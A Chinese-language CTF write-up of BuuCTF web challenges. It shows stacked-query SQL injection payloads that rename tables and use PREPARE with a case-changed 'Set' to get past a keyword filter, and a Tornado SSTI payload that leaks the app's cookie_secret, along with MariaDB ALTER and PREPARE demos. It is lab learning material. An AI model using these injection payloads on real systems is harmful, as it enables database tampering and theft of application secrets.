BuuCTF Web Writeup (2)

解题过程

payloaf: ?inject=';rename table `words` to `w`; rename table `1919810931114514` to `words`; alter table `words` change `flag` `id` varchar(255);desc words; return : array(6) { [0]=> string(2) "id" [1]=> string(12) "varchar(255)" [2]=> string(3) "YES" [3]=> string(0) "" [4]=> NULL [5]=> string(0) "" }

回显可以判断修改成功

payload: ?inject=1' or '1 return : array(1) { [0]=> string(42) "flag{287b6180-ddd5-43a7-9f38-4d38defd1013}" }

将payload代入sql语句

$sql = select id, data from words where id = '1' or '1'; => $sql = select id, data from words where 1; => $sql = select id, data from words; MySQL ALTER

用于修改数据表名或者修改数据表字段

删除，添加字段

MariaDB [test]> desc 0d4y; +-------+--------------+------+-----+---------+-------+ | Field | Type | Null | Key | Default | Extra | +-------+--------------+------+-----+---------+-------+ | name | varchar(255) | YES | | NULL | | +-------+--------------+------+-----+---------+-------+ 1 row in set (0.00 sec) MariaDB [test]> alter table 0d4y add age int; Query OK, 0 rows affected (0.01 sec) Records: 0 Duplicates: 0 Warnings: 0 MariaDB [test]> desc 0d4y; +-------+--------------+------+-----+---------+-------+ | Field | Type | Null | Key | Default | Extra | +-------+--------------+------+-----+---------+-------+ | name | varchar(255) | YES | | NULL | | | age | int(11) | YES | | NULL | | +-------+--------------+------+-----+---------+-------+ 2 rows in set (0.00 sec) MariaDB [test]> alter table 0d4y drop age; Query OK, 0 rows affected (0.01 sec) Records: 0 Duplicates: 0 Warnings: 0 MariaDB [test]> desc 0d4y; +-------+--------------+------+-----+---------+-------+ | Field | Type | Null | Key | Default | Extra | +-------+--------------+------+-----+---------+-------+ | name | varchar(255) | YES | | NULL | | +-------+--------------+------+-----+---------+-------+ 1 row in set (0.00 sec)

修改字段

MariaDB [test]> desc 0d4y; +-------+--------------+------+-----+---------+-------+ | Field | Type | Null | Key | Default | Extra | +-------+--------------+------+-----+---------+-------+ | name | varchar(255) | YES | | NULL | | +-------+--------------+------+-----+---------+-------+ 1 row in set (0.00 sec) MariaDB [test]> alter table 0d4y modify name varchar(100); Query OK, 1 row affected (0.02 sec) Records: 1 Duplicates: 0 Warnings: 0 MariaDB [test]> desc 0d4y; +-------+--------------+------+-----+---------+-------+ | Field | Type | Null | Key | Default | Extra | +-------+--------------+------+-----+---------+-------+ | name | varchar(100) | YES | | NULL | | +-------+--------------+------+-----+---------+-------+ 1 row in set (0.00 sec) MariaDB [test]> alter table 0d4y change `name` `id` int; Query OK, 1 row affected, 1 warning (0.02 sec) Records: 1 Duplicates: 0 Warnings: 1 MariaDB [test]> desc 0d4y; +-------+---------+------+-----+---------+-------+ | Field | Type | Null | Key | Default | Extra | +-------+---------+------+-----+---------+-------+ | id | int(11) | YES | | NULL | | +-------+---------+------+-----+---------+-------+ 1 row in set (0.00 sec) 0x01 预处理

MySQL用户变量定义格式

set @v = xxx;

解题思路

0x00 将查询flag的sql语句预定义

0x01 执行预定义sql语句

解题过程

payload: ?inject=';set @s = concat('s', 'elect * from `1919810931114514`');prepare a from @s; execute a; return : strstr($inject, "set") && strstr($inject, "prepare")

回显表示set与prepare不能同时存在

payload: ?inject=';Set @s = concat('s', 'elect * from `1919810931114514`');prepare a from @s;execute a; return : array(1) { [0]=> string(42) "flag{21e33093-12e2-4d51-852a-1db8bcab4ff6}" } MySQL PREPARE PREPARE name from '[my sql sequece]'; //预定义SQL语句 EXECUTE name; //执行预定义SQL语句 (DEALLOCATE || DROP) PREPARE name; //删除预定义SQL语句 MariaDB [test]> prepare flag from "select * from 0d4y"; Query OK, 0 rows affected (0.00 sec) Statement prepared MariaDB [test]> execute flag; +------+ | id | +------+ | 0 | +------+ 1 row in set (0.00 sec) MariaDB [test]> drop prepare flag; Query OK, 0 rows affected (0.00 sec) easy_tornado

题目提示

-- /flag.txt flag in /fllllllllllllag -- /welcome.txt render -- /hints.txt md5(cookie_secret+md5(filename))

解题思路

0x00 render模板渲染暗示存在SSTI服务端模板注入攻击

0x01 handler.settings保存配置选项，包括cookie_secret

解题方法

访问文件时观察url

payload: /file?filename=http://www.likecs.com/welcome.txt&filehash=1ee0dabf22eb0879a60444267ed3e063

存在文件读取点，访问/fllllllllllllag

页面跳转至/error?msg=Error

尝试SSTI

payload: /error?msg={{handler.settings}} 界面回显: {'autoreload': True, 'compiled_template_cache': False, 'cookie_secret': '9c83fab7-1b67-404c-9aa8-69453579ac8c'}